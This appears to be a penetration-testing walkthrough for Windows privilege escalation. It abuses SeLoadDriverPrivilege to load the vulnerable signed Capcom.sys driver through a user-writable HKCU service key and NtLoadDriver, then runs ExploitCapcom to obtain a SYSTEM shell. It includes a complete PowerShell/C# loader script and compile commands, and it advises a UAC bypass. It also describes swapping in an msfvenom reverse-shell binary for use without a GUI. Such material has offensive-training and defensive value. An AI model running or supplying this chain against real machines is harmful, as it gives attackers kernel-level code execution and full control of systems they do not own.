SeLoadDriverPrivilege

Enable the permission first. The privilege only has to be enabled, but it must already be present in the process token: under UAC an administrator's filtered (medium-integrity) token has SeLoadDriverPrivilege stripped, so check with `whoami /priv` and, if it is listed as absent, bypass UAC first (for example with UACMe) to get a token that holds it.

Capcom.sys is a legitimately signed driver (shipped with Capcom's Street Fighter V anti-cheat) that exposes an IOCTL through which any user who can open its device can run arbitrary code in kernel mode, so loading it is as good as SYSTEM. Because it is signed, Driver Signature Enforcement lets it load; on current Windows builds it is on Microsoft's vulnerable driver blocklist, so with the blocklist or HVCI enabled NtLoadDriver refuses it.

Use the linked EnableSeLoadDriverPrivilege.cpp loader to load the driver: it enables SeLoadDriverPrivilege in its own token and then calls NtLoadDriver with the registry path of the driver's service key.

Add these includes:

#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"

Then compile it with cl.exe:

cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

Add a reference to driver

Download Capcom.sys and save it to C:\temp. Then create a service key for it in the registry. The key does not have to live under HKLM: NtLoadDriver accepts any registry path, so a key under HKCU, which the user can write, works as long as it carries an ImagePath value of \??\C:\temp\Capcom.sys and a Type value of 1 (SERVICE_KERNEL_DRIVER).

The odd \??\ prefix on the ImagePath is an NT object path: \??\ is the per-session DOS devices directory of the object manager namespace, where drive letters such as C: are symbolic links. The driver is loaded through the native NtLoadDriver call rather than a Win32 API, so the path is resolved by the kernel's object manager, which is why it is written in native rather than Win32 form.

Verify Driver not loaded

Use DriverView.exe to dump the list of loaded kernel modules, then filter it for Capcom; nothing should match yet:

.\DriverView.exe /stext drivers.txt

cat drivers.txt | Select-String -pattern Capcom

Then run the EnableSeLoadDriverPrivilege.exe compiled earlier, which enables the privilege and calls NtLoadDriver on the key created above:

EnableSeLoadDriverPrivilege.exe

Verify Capcom Driver is Listed

Re-run the DriverView dump and the Select-String filter; Capcom.sys should now appear in the list.
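The whole load sequence above (service key under HKCU, enabling the privilege, NtLoadDriver, and a before/after check of the loaded-driver list) as one PowerShell script. This is an added example, not code from the original page or from the linked loader: it uses ntdll's RtlAdjustPrivilege in place of the AdjustTokenPrivileges sequence the C++ source uses, reads the loaded-driver list through EnumDeviceDrivers (the same source DriverView uses) instead of parsing a DriverView dump, and assumes the driver sits at C:\temp\Capcom.sys, that the key name CAPCOM is free, and that the token already holds the privilege. The helper class name DrvLoader is arbitrary.

```powershell
# Added example: PowerShell equivalent of the load procedure on this page.
# Assumptions: driver at C:\temp\Capcom.sys, arbitrary key name CAPCOM, and a
# token that already holds SeLoadDriverPrivilege (it only needs enabling).
$DriverPath  = 'C:\temp\Capcom.sys'
$ServiceName = 'CAPCOM'

$source = @'
using System;
using System.Runtime.InteropServices;
using System.Text;
public static class DrvLoader {
    [StructLayout(LayoutKind.Sequential)]
    struct UNICODE_STRING { public ushort Length; public ushort MaximumLength; public IntPtr Buffer; }

    [DllImport("ntdll.dll")]
    static extern int RtlAdjustPrivilege(int privilege, [MarshalAs(UnmanagedType.I1)] bool enable,
        [MarshalAs(UnmanagedType.I1)] bool currentThread, [MarshalAs(UnmanagedType.I1)] out bool wasEnabled);
    [DllImport("ntdll.dll")]
    static extern int NtLoadDriver(ref UNICODE_STRING driverServiceName);
    [DllImport("psapi.dll", SetLastError = true)]
    static extern bool EnumDeviceDrivers([Out] IntPtr[] bases, uint cb, out uint cbNeeded);
    [DllImport("psapi.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern uint GetDeviceDriverBaseNameW(IntPtr imageBase, StringBuilder name, uint size);

    const int SE_LOAD_DRIVER_PRIVILEGE = 10;   // LUID of SeLoadDriverPrivilege
    public const int STATUS_PRIVILEGE_NOT_HELD = unchecked((int)0xC0000061);

    // Enable the privilege in the current token. Returns STATUS_PRIVILEGE_NOT_HELD
    // when the token never had it (UAC-filtered or not granted), which enabling
    // cannot fix: that is what the UAC-bypass step at the top of the page is for.
    public static int EnablePrivilege() {
        bool was;
        return RtlAdjustPrivilege(SE_LOAD_DRIVER_PRIVILEGE, true, false, out was);
    }

    // NtLoadDriver takes the service key as a native registry path inside a
    // UNICODE_STRING; the buffer must outlive the call, hence the manual alloc.
    public static int LoadDriver(string ntRegistryPath) {
        var us = new UNICODE_STRING();
        us.Buffer = Marshal.StringToHGlobalUni(ntRegistryPath);
        us.Length = (ushort)(ntRegistryPath.Length * 2);
        us.MaximumLength = (ushort)(us.Length + 2);
        try { return NtLoadDriver(ref us); }
        finally { Marshal.FreeHGlobal(us.Buffer); }
    }

    // Loaded kernel modules via EnumDeviceDrivers, the same source DriverView
    // reads; unlike the SCM view this also shows drivers loaded from an HKCU key.
    public static bool IsDriverLoaded(string baseName) {
        uint needed;
        EnumDeviceDrivers(null, 0, out needed);
        var bases = new IntPtr[(int)(needed / IntPtr.Size)];
        if (!EnumDeviceDrivers(bases, needed, out needed)) return false;
        var sb = new StringBuilder(260);
        foreach (var b in bases) {
            sb.Clear();
            if (GetDeviceDriverBaseNameW(b, sb, (uint)sb.Capacity) > 0 &&
                string.Equals(sb.ToString(), baseName, StringComparison.OrdinalIgnoreCase)) return true;
        }
        return false;
    }
}
'@
Add-Type -TypeDefinition $source

# 1. Service key under HKCU, which any user can write. NtLoadDriver reads ImagePath
#    and Type from whatever key path it is handed, so HKLM is not needed.
#    \??\ is the per-session DOS-devices directory of the NT object namespace, which
#    is why the kernel can resolve "\??\C:\temp\Capcom.sys" with no Win32 path code.
$key = "HKCU:\System\CurrentControlSet\$ServiceName"
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name ImagePath -Value "\??\$DriverPath" -Type String
Set-ItemProperty -Path $key -Name Type      -Value 1 -Type DWord   # SERVICE_KERNEL_DRIVER

# 2. HKCU is \Registry\User\<SID> in the native namespace; that form, not the
#    drive-letter one, is what NtLoadDriver expects.
$sid    = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
$ntPath = "\Registry\User\$sid\System\CurrentControlSet\$ServiceName"

"Before load: Capcom.sys present = $([DrvLoader]::IsDriverLoaded('Capcom.sys'))"

# 3. Enable the privilege, then load.
$status = [DrvLoader]::EnablePrivilege()
if ($status -eq [DrvLoader]::STATUS_PRIVILEGE_NOT_HELD) {
    throw 'Token does not hold SeLoadDriverPrivilege (UAC-filtered or never granted); get an unfiltered token first'
}
if ($status -ne 0) { throw ('RtlAdjustPrivilege failed: 0x{0:X8}' -f $status) }

$status = [DrvLoader]::LoadDriver($ntPath)
# A non-zero NTSTATUS here means the kernel refused the image, e.g. signature
# checks or the vulnerable-driver blocklist on current builds.
if ($status -ne 0) { throw ('NtLoadDriver failed: 0x{0:X8}' -f $status) }

"After load:  Capcom.sys present = $([DrvLoader]::IsDriverLoaded('Capcom.sys'))"
```

The before/after lines replace the DriverView check: the first should report False and the second True. The NtLoadDriver status is printed as an NTSTATUS so a refusal can be told apart from a missing privilege; the privilege case is reported separately because it is the one the UAC-bypass step addresses.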

Use ExploitCapcom Tool to Escalate Privileges

Compile ExploitCapcom and run it. It opens the device exposed by the loaded Capcom.sys, uses the driver's arbitrary kernel code execution to run its payload in ring 0 and spawns a command prompt as SYSTEM.

Now we get a SYSTEM shell.

No GUI

If we do not have GUI access to the target, ExploitCapcom.cpp has to be modified before compiling. On line 292 the CommandLine string "C:\\Windows\\system32\\cmd.exe" is replaced with the path of a payload such as a reverse-shell binary created with msfvenom, for example C:\ProgramData\revshell.exe, so that the exploit launches that binary as SYSTEM instead of an interactive cmd.exe.

Automating with EopLoadDriver

EopLoadDriver automates the steps above: it creates the service key under HKCU with the ImagePath and Type values, enables SeLoadDriverPrivilege in its own token and calls NtLoadDriver, so the manual registry editing and the hand-compiled loader are not needed. Once the driver is loaded, run ExploitCapcom.exe to pop a SYSTEM shell or launch the custom binary.
